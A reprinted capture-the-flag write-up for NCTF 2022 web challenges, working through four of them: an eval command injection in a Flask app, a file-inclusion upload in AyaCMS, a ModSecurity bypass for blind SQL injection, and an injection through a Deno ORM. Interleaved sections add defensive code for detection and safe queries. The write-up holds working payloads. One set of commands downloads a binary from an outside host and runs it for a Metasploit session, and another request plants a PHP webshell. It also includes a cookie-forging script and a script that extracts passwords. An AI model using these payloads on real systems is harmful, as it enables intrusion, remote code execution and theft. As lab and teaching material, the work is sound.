
1.calc

Question address: http://116.205.139.166:8001/

Right-click to view the page source; /source gives the source code:

import os
import time
from flask import Flask, request

app = Flask(__name__)

@app.route('/calc', methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get('num')
    # the log line is built with string formatting and handed to a shell
    log = 'echo {0}{1}{2} >> ./tmp/log.txt'.format(time.strftime('%Y%m%d-%H%M%S', time.localtime()), ip, num)
    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        # note: data is unbound if eval(num) raised
        return str(data)
    else:
        return 'waf!'

Triggering a Flask error reveals the filtering rules of the waf:

http://162.14.110.241:8050/calc?num[]=

def waf(s):
    # a few entries of this list were not readable in the copied listing
    blacklist = ['import', '(', ')', '#', '@', '^', '$', ',', '?', '`', ' ', '_', '|', ';',
                 '{', '}', 'getattr', 'os', 'system', 'class', 'subclasses', 'mro', 'request',
                 'args', 'eval', 'if', 'subprocess', 'file', 'open', 'popen', 'builtins',
                 'compile', 'execfile', 'from_pyfile', 'config', 'local', 'self', 'item',
                 'getitem', 'getattribute', 'func_globals', '__init__', 'join', '__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag = False
            print(no)
            break
    return flag

After trying it, I found that I can control num, use %0a to separate different commands, and use %09 instead of spaces.

Note that num must still evaluate without error in eval(num), otherwise execution never reaches os.system(log). The solution is to wrap each command word in single quotes: num is then a valid string expression for eval, while the shell sees the quoted words as a command.

/calc?num=%0a'curl'%09'gtwq54.dnslog.cn'%0a

Because backticks do not make it easy to get the output back, I simply use curl to download a payload and get a session with msf.

/calc?num=%0a'curl'%09'http://x.x.x.x:yyyy/testapp'%09'-o'%09'/tmp/testapp'%0a

/calc?num=%0a'chmod'%09'777'%09'/tmp/testapp'%0a

/calc?num=%0a'/tmp/testapp'%0a

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202212031408772.png

2.ez_php

Question address: http://81.70.155.160/

AyaCMS GitHub address:

https://github.com/loadream/AyaCMS

The GitHub issues list many vulnerabilities, but all of them require being logged in to the admin panel or the front end.

Weak passwords failed on the admin panel (admin.php), and front-end registration was unavailable.

So I downloaded the source code directly for code auditing and stared at it for most of the day.

Many places in the source code have defined('IN_AYA') or exit('Access Denied'); meaning they cannot be accessed directly and must be included or required by another PHP file that has defined the IN_AYA constant.

So the problem turns into finding a file inclusion vulnerability.

After searching for a long time I found one at /aya/admin.inc.php:

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202212031946153.png

get_cookie reads the cookie value with the aya_ prefix, and the source of decrypt and its matching encrypt function can also be found.

The AYA_KEY used for encryption is the default value, aaa.

Once a file can be included, the options open up considerably; combine it with a known vulnerability:

https://github.com/loadream/AyaCMS/issues/3

Payload:

<?php
// random pad of lowercase letters, as in the CMS source
function random($length=4,$chars='abcdefghijklmnopqrstuvwxyz'){
    $hash='';
    $max=strlen($chars)-1;
    for($i=0;$i<$length;$i++){
        $hash.=$chars[mt_rand(0,$max)];
    }
    return $hash;
}

// XOR with the 32-char md5 of the key, repeating every 32 bytes
function kecrypt($txt,$key){
    $key=md5($key);
    $len=strlen($txt);
    $ctr=0;
    $str='';
    for($i=0;$i<$len;$i++){
        $ctr=$ctr==32?0:$ctr;
        $str.=$txt[$i]^$key[$ctr++];
    }
    return $str;
}

// the default key 'aaa' is what the challenge instance uses
function encrypt($txt,$key=''){
    $key or $key='aaa';
    $rnd=random(32);
    $len=strlen($txt);
    $ctr=0;
    $str='';
    for($i=0;$i<$len;$i++){
        $ctr=$ctr==32?0:$ctr;
        $str.=$rnd[$ctr].($txt[$i]^$rnd[$ctr++]);
    }
    return str_replace('=','',base64_encode(kecrypt($str,$key)));
}

echo encrypt('./module/admin/fst_upload');

HTTP request:

POST /aya/admin.inc.php HTTP/1.1
Host: 81.70.155.160
Content-Length: 244
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=---WebKitFormBoundarykhsd4wQ8UBmzCnD1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.62
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: aya_admin_lang=QWwPIAJ9EitZZEEoQWtYOFA0DCUAMFttV2ANPBUlRmFNKBRmFTEQG1ZxTDFaaVEyQyMWdA
Connection: close

-----WebKitFormBoundarykhsd4wQ8UBmzCnD1
Content-Disposition: form-data; name='upfile'; filename='xzxz123123123.php'
Content-Type: application/octet-stream

<?php eval($_REQUEST[1]);phpinfo();
-----WebKitFormBoundarykhsd4wQ8UBmzCnD1--

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202212031953539.png

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202212031954835.png
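The two weaknesses chained here are a cookie that is encrypted but not authenticated (so anyone holding the default key aaa can mint one) and a cookie value that becomes an include path. As an added example that is not AyaCMS code, the sketch below shows the shape of a fix in Python: the cookie carries an HMAC, the default key is refused at startup, and the verified value is only ever mapped through an allowlist to a file. The validate_key rule, LANG_FILES table and function names are assumptions; the values in the test are constructed.

```python
import base64
import binascii
import hashlib
import hmac
import re

DEFAULT_KEY = "aaa"    # the shipped default the write-up relies on

# Hypothetical allowlist: cookie value -> file the handler may include.
LANG_FILES = {
    "en": "module/admin/lang/en.php",
    "zh-cn": "module/admin/lang/zh-cn.php",
}


def validate_key(key: str) -> bool:
    """Refuse the default key and anything too short to resist guessing;
    the deployment should fail to start when this returns False."""
    return key != DEFAULT_KEY and len(key) >= 16


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_cookie(value: str, key: bytes) -> str:
    """value.mac, with the MAC computed over the plaintext value."""
    data = value.encode("utf-8")
    mac = hmac.new(key, data, hashlib.sha256).digest()
    return _b64(data) + "." + _b64(mac)


def read_cookie(cookie: str, key: bytes):
    """Return the cookie value if its MAC verifies, otherwise None."""
    try:
        data_part, mac_part = cookie.split(".", 1)
        data = _unb64(data_part)
        mac = _unb64(mac_part)
        value = data.decode("utf-8")
    except (ValueError, binascii.Error, UnicodeDecodeError):
        return None
    expected = hmac.new(key, data, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):
        return None
    return value


def resolve_lang_file(cookie_value):
    """Map a verified value to a file through the allowlist. The raw string is
    never used to build a path, so ../ or module names cannot be smuggled in
    even by someone who can sign cookies."""
    if cookie_value is None or not re.fullmatch(r"[a-z]{2}(-[a-z]{2})?", cookie_value):
        return None
    return LANG_FILES.get(cookie_value)


def include_target(cookie, key):
    """What the request handler would call: verify first, then allowlist."""
    return resolve_lang_file(read_cookie(cookie, key))


if __name__ == "__main__":
    k = b"k" * 32   # constructed key; real deployments load it from config
    c = make_cookie("en", k)
    print(c, "->", include_target(c, k))
```

Two separate controls are at work: the MAC stops forgery by anyone without the key, and the allowlist stops misuse by anyone with it, which is exactly the failure mode of an encryption-only cookie with a guessable default.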

3.ezbypass

Hint: the WAF is ModSecurity.

Question address: http://162.14.110.241:8099/sql.php http://121.37.11.207:8099/sql.php

A reference article found online:

https://blog.h3xstream.com/2021/10/bypassing-modsecurity-waf.html

The rest is just scripting its payload; since the challenge prompt says "Can you find my password?", we guess the contents of the password column character by character.

import requests
import time

flag = ''
i = 1
while True:
    lo = 32
    hi = 127
    # binary search the ASCII value of the i-th password character
    while lo < hi:
        time.sleep(0.08)
        mid = (lo + hi) // 2
        print(chr(mid))
        payload = 'if(ascii 1.e(substring(1.e(select password from users.info),{},1))>{},1,0)'.format(i, mid)
        url = 'http://162.14.110.241:8099/sql.php?id={}'.format(payload)
        res = requests.get(url)
        if 'letian' in res.text:   # 'letian' shows up when the condition is true
            lo = mid + 1
        else:
            hi = mid
    if lo == 32:   # nothing above the floor: we are past the end of the string
        break
    flag += chr(lo)
    i += 1
    print('found', flag)

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202212032123517.png
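From the defender's side, a boolean-based blind search like the one above has a clear fingerprint: dozens of near-identical requests from one source, each carrying substring/ascii/select and, here, the 1.e( numeric-literal prefix the reference article uses to slip past ModSecurity. The detector below is an added example, not from the write-up or ModSecurity; it parses combined-format access logs, scores each request target against those markers after URL-decoding, and reports sources that exceed a burst threshold. The log lines are constructed for the example, and the marker list and thresholds are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_plus

# Constructed sample traffic in Apache combined-log style (not real logs).
SAMPLE_LOG = """\
10.0.0.5 - - [03/Dec/2022:21:20:00 +0800] "GET /sql.php?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [03/Dec/2022:21:20:01 +0800] "GET /sql.php?id=if(ascii%201.e(substring(1.e(select%20password%20from%20users.info),1,1))%3E79,1,0) HTTP/1.1" 200 512
10.0.0.9 - - [03/Dec/2022:21:20:01 +0800] "GET /sql.php?id=if(ascii%201.e(substring(1.e(select%20password%20from%20users.info),1,1))%3E103,1,0) HTTP/1.1" 200 512
10.0.0.9 - - [03/Dec/2022:21:20:02 +0800] "GET /sql.php?id=if(ascii%201.e(substring(1.e(select%20password%20from%20users.info),1,1))%3E115,1,0) HTTP/1.1" 200 512
10.0.0.5 - - [03/Dec/2022:21:20:02 +0800] "GET /sql.php?id=2 HTTP/1.1" 200 498
10.0.0.9 - - [03/Dec/2022:21:20:02 +0800] "GET /sql.php?id=if(ascii%201.e(substring(1.e(select%20password%20from%20users.info),1,1))%3E109,1,0) HTTP/1.1" 200 512
10.0.0.9 - - [03/Dec/2022:21:20:03 +0800] "GET /sql.php?id=if(ascii%201.e(substring(1.e(select%20password%20from%20users.info),1,1))%3E112,1,0) HTTP/1.1" 200 512
10.0.0.9 - - [03/Dec/2022:21:20:03 +0800] "GET /sql.php?id=if(ascii%201.e(substring(1.e(select%20password%20from%20users.info),1,1))%3E110,1,0) HTTP/1.1" 200 512
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each marker on its own is weak evidence; several together are not.
MARKERS = [
    ("numeric-literal-prefix", re.compile(r"\d\.e\(", re.I)),
    ("substring", re.compile(r"\bsubstring\s*\(", re.I)),
    ("subselect", re.compile(r"\bselect\b.+\bfrom\b", re.I | re.S)),
    ("ascii", re.compile(r"\bascii\b", re.I)),
]


def sqli_markers(target: str):
    """Decode the request target (twice, to catch double encoding) and return
    the names of the markers it matches."""
    decoded = unquote_plus(unquote_plus(target))
    return [name for name, rx in MARKERS if rx.search(decoded)]


def parse_line(line: str):
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "target": m.group("target")}


def flagged_requests(log_text: str, min_markers: int = 2):
    """Requests whose target hits at least min_markers markers."""
    out = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = sqli_markers(rec["target"])
        if len(hits) >= min_markers:
            rec["markers"] = hits
            out.append(rec)
    return out


def burst_sources(log_text: str, threshold: int = 5, window_seconds: int = 60):
    """Per source IP, the most flagged requests seen inside any window of
    window_seconds; only IPs reaching threshold are returned. A scripted
    character-by-character search produces exactly this kind of burst."""
    by_ip = defaultdict(list)
    for rec in flagged_requests(log_text):
        by_ip[rec["ip"]].append(rec["ts"])
    alerts = {}
    for ip, stamps in by_ip.items():
        stamps.sort()
        best = 0
        for i, start in enumerate(stamps):
            n = sum(1 for t in stamps[i:] if (t - start).total_seconds() <= window_seconds)
            best = max(best, n)
        if best >= threshold:
            alerts[ip] = best
    return alerts


if __name__ == "__main__":
    for rec in flagged_requests(SAMPLE_LOG):
        print(rec["ip"], rec["ts"].isoformat(), rec["markers"])
    print(burst_sources(SAMPLE_LOG))
```

Rate-based alerting matters here because a WAF bypass is, by definition, a request the signature engine let through; the request count per source is a signal the bypass cannot hide.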

4.ez_sql

Question address: http://81.70.155.160:3000/

Attachment: https://nctf.h4ck.fun/static/upload/files/06b43b853452e30514edf6bd709b3f99.zip

The challenge description provides the source code.

app.js

import { Application, Router, helpers } from 'https://deno.land/x/oak/mod.ts';
import Flight from './db.js';

const app = new Application();
const router = new Router();

router.get('/', async (ctx) => {
    ctx.response.body = 'check your flight `/flight?id=`';
});

router.get('/flight', async (ctx) => {
    // the entire query-string object is handed to where()
    const id = helpers.getQuery(ctx, { mergeParams: true });
    const info = await Flight.select({ departure: 'departure', destination: 'destination' }).where(id).all();
    ctx.response.body = info;
});

app.use(router.routes());
app.use(router.allowedMethods());

app.listen({ port: 3000, hostname: '0.0.0.0' });

db.js

import { DataTypes, Database, Model, SQLite3Connector } from 'https://deno.land/x/[email protected]/mod.ts';

const connector = new SQLite3Connector({
    filepath: '/tmp/flight.db'
});

const db = new Database(connector);

class Flight extends Model {
    static table = 'flight';
    static fields = {
        id: { primaryKey: true, autoIncrement: true },
        department: DataTypes.STRING,
        destination: DataTypes.STRING,
    };
}

class Flag extends Model {
    static table = 'flag';
    static fields = {
        flag: DataTypes.STRING,
    };
}

db.link([Flight, Flag]);

await db.sync({ drop: true });

await Flight.create({
    department: 'Paris',
    destination: 'Tokyo',
});

await Flight.create({
    department: 'Las Vegas',
    destination: 'Washington',
});

await Flight.create({
    department: 'London',
    destination: 'San Francisco',
});

await Flag.create({
    flag: Deno.env.get('flag'),
});

export default Flight

This is almost identical to foodAPI from Hack.lu CTF 2022; reference write-ups:

https://blog.huli.tw/2022/10/31/hacklu-ctf-2022-writeup/

https://gist.github.com/parrot409/f7f5807478f50376057fba755865bd98

https://gist.github.com/terjanq/1926a1afb420bd98ac7b97031e377436

The only difference is that the original challenge took id as a RESTful path parameter, whereas here it comes from the GET query string, so the original exploit cannot be copied verbatim.

But the analysis in those articles shows that the idea is that the query parameters get spliced into the SQL statement, so mimic the original payload and pass it in as an extra GET parameter:

http://81.70.155.160:3000/flight?id=1?=a` and 0 union select flag,2 from flag;

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202212041449665.png
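The root cause is that every key of the client's query object is turned into a column identifier by the ORM, so the client controls SQL syntax, not just values. As an added example that is not the challenge's or denodb's code, the Python/sqlite3 sketch below puts the unsafe string-splicing pattern next to a filter builder that only accepts allowlisted column names, converts each value through a declared type, and binds values as parameters. The ALLOWED_FILTERS table, function names and sample rows are assumptions constructed for the example.

```python
import sqlite3

# Columns a client may filter on, each with the converter that validates its value.
ALLOWED_FILTERS = {"id": int, "departure": str, "destination": str}


def build_where_unsafe(params):
    """The pattern behind the bug: client keys become identifiers by string
    concatenation, so a key containing a backtick rewrites the statement.
    Shown for contrast only; nothing here executes it."""
    clauses = [f"`{k}` = '{v}'" for k, v in params.items()]
    return " WHERE " + " AND ".join(clauses) if clauses else ""


def build_where(params):
    """Allowlisted keys only; values pass through a converter and are bound."""
    clauses, values = [], []
    for key, raw in params.items():
        if key not in ALLOWED_FILTERS:
            raise ValueError(f"unknown filter {key!r}")
        try:
            values.append(ALLOWED_FILTERS[key](raw))
        except (TypeError, ValueError):
            raise ValueError(f"bad value for {key!r}") from None
        clauses.append(f'"{key}" = ?')   # key is known-good, quoting is cosmetic
    if not clauses:
        return "", []
    return " WHERE " + " AND ".join(clauses), values


def setup_db():
    """In-memory copy of the challenge schema with constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE flight (id INTEGER PRIMARY KEY AUTOINCREMENT, "
                "departure TEXT, destination TEXT)")
    con.execute("CREATE TABLE flag (flag TEXT)")
    con.executemany("INSERT INTO flight (departure, destination) VALUES (?, ?)",
                    [("Paris", "Tokyo"), ("Las Vegas", "Washington"), ("London", "San Francisco")])
    con.execute("INSERT INTO flag VALUES (?)", ("flag{constructed-sample}",))
    con.commit()
    return con


def handle_flight(con, params):
    """Safe equivalent of the /flight route: rows as dicts, or an error dict.
    A rejected filter never reaches the database at all."""
    try:
        where, values = build_where(params)
    except ValueError as e:
        return {"error": str(e)}
    rows = con.execute("SELECT departure, destination FROM flight" + where, values).fetchall()
    return [{"departure": d, "destination": t} for d, t in rows]


if __name__ == "__main__":
    con = setup_db()
    print(handle_flight(con, {"id": "1"}))
    print(handle_flight(con, {"a` and 0 union select flag,2 from flag": "1"}))
```

The flag table is unreachable through the safe builder because the statement text is fixed by the server; only the bound values vary, and even those are type-checked before binding.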

Attachment download: https://github.com/X1cT34m/NCTF2022

Reprinted original text: https://exp10it.cn/2022/12/nctf-2022-web-writeup/#calc
